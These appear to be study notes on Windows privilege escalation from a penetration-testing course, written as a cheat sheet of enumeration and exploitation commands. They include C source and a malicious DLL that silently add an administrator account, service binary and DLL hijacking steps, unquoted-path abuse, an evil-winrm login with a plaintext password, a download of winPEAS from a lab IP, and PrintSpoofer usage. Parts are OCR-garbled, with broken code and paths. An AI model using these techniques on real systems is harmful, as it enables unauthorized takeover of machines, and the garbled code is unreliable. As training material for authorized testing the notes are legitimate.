Windows Privilege Escalation


# Windows Enumeration

PS> whoami

PS> whoami /groups

net user
net user steve
Get-LocalUser

net localgroup
Get-LocalGroup 

Get-LocalGroupMember Administrators

systeminfo

ipconfig

route print

netstat -ano

PS C:\Users\dave> Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft \Windows\CurrentVe
rsion\Uninstall\*" select displayname

PS C: \Users\dave> Get-ItemProperty "HKLM:\SOFTWARE\Microsoft Windows\CurrentVersion\Uninst
all\*" | select displayname
Get-Process

PS C:\Users\dave> Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction Sile
ntlyContinue

PS C: Users dave› Get-ChildItem -Path C:\xampp Include *,txt,*ini -File -Recurse - ErrorA
ction SilentlyContinue

PS C:\Users\dave> Get-ChildItem -Path C:\Users\davel -Include *.txt,*.pdf,*.xls,*.xlsx,*.d
oc.*.docx -File -Recurse -ErrorAction SilentlvContinue

runas

## PowerShell Transcription, PowerShell Script Block Logging

to use history of commands as attack vector

Get-History

(Get-PSReadlineOption).HistorySavePath

Use Winrm to leverage powershell remoting session

evil-winrm -i 192.168.50.220 -U daveadmin -p "quertquertquert123\!\!"
# this solves problems with winrm when using it asp pivot from a bind shell

## Automated Enumeration

WinPeas

# File Serving
iwr -uri http://192.168.118.8/winPEASx64.exe -Outfile winPEAS.exe

##

Service Binary Hijacking

# Useful commandlets
services.msc, Get-Service, Get-CimInstance, Get-WmiObject, Get-ACL

# Find running processes and list the path
PS C:\Users\dave> Get-CimInstance -ClassName win32_service | Select Name,State,PathName 
	| Where-Object {$_.State -like 'Running'}

# List privileges for certain binaries
icacls "filepath"


Permissions in Windows

F -> Full access

M -> Modify access

RX -> Read and execute access

R -> Read-only access

W -> Write-only access

c code to add users:

1 #include <stdlib.h>
2
3 int main ()
4 {
5 int i;
6
7 i = system ("net user dave2 password123! /add");
8 i = system ("net localgroup administrators dave2 /add");
9
10 return 0;
11 }
12
// compile:
// x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

##

binary hijacking

:

move C:\xampp\mysq1\bin\mysqld.exe mysqld.exe
move .\adduser.exe C:\xampp\mysq1\bin\mysqld.exe
net stop mysql

# check startMode
# PS C:\Users\dave> Get-CimInstance -ClassName win32_service | 
#	Select Name, StartMode | Where-Object {$_.Name -like 'mysq'}

shutdown /r /t 0

#check if exploit was successful and administrator was added
Get-LocalGroupMember administrators

PowerUp.ps1

Get-ModifiableServiceFile # display services the current user can modify


Install-ServiceBinary -Name 'mysql' #Get-ModifiblePath

##

service DLL hijacking

safe dll search mode order:

1. The directory from which the application loaded.

2. The system directory.

3. The 16-bit system directory.

4. The Windows directory.

5. The current directory.

6. The directories that are listed in the PATH environment variable.

download the service you want to monitor

# use ProcMon
# add filter 'Process Name is BetaServ.exe'
# restart the service so that you can see dll being loaded
Restart-Service BetaService
#check for dll with 'name not found'

#hijack an arbitrary .dll, DllMain is executed when dll is attached

basic.dll:

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID pReserved ) // Reserved
{
	switch (ul_reason_for_call )
	{
	case DLL_PROCESS_ATTACH: // A process is loading the DLL.
	break;
	case DLL_THREAD_ATTACH: // A process is creating a new thread.
	break;
	case DLL_THREAD_DETACH: // A thread exits normally.
	break;
	case DLL_PROCESS_DETACH: // A process unloads the DLL.
	break;

return TRUE;
}

myDLL.dll

#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule, // Handle to DLL module
DevoT preserved Ta Reserveason for calling function
{
	switch ( ul_reason_for_call )
	{
		case DLL_PROCESS_ATTACH: // A process is loading the DLL.
		int i;
		i = system ("net user dave2 password123! /add");
		i = system ("net localgroup administrators dave2 /add");
		break;
		case DLL_THREAD_ATTACH: // A process is creating a new thread.
		break;
		case DLL_THREAD_DETACH: // A thread exits normally.
		break;
		case DLL_PROCESS_DETACH: // A process unloads the DLL.
		break;
	}
return TRUE;
}
// compile
// x86_64-w64-mingw32-gcc mYDLL.cpp -shared -O myDLL.dll
// -shared is for dll compilation
// serve it and than Restart-Service BetaService to execute

## Unquoted service paths

we have write permissions on service directory or subdirectories, but cannot replace files in them

#example
# when trying to execute the following path
C: \Program Files\My Program\My Service\service.exe
#Windows will try to execute in order:
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe

# we can craft and execute some of this
#vector:

Get-CimInstance -ClassName win32_service | Select Name, State, PathName
# and find unquoted execution paths, or
#cmd
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
#\"
# /v -> don't match

# now use icacls to see if the current user can write in one of the paths
# exploit.exe
# check if attack was successfull
net user
net localgroup administators

#with PowerUp.ps1:
Get-UnquotedService
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps \Current.exe"

## Scheduled Tasks

Get-ScheduledTask
schtasks /query /fo LIST /v

# search for tasks with admin priv and write permission on the executable

## SeImpersonatePrivilege or other privileges

whoami /priv
# if our user has some strange privilege associated, we
# should look on how to exploit it

PS C: \Users\dave> .\PrintSpoofer64.exe -i -c powershell.exe
# -i interactive, -c command
# Other privileges that may lead to privilege escalation are
# SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, and
# SeDebug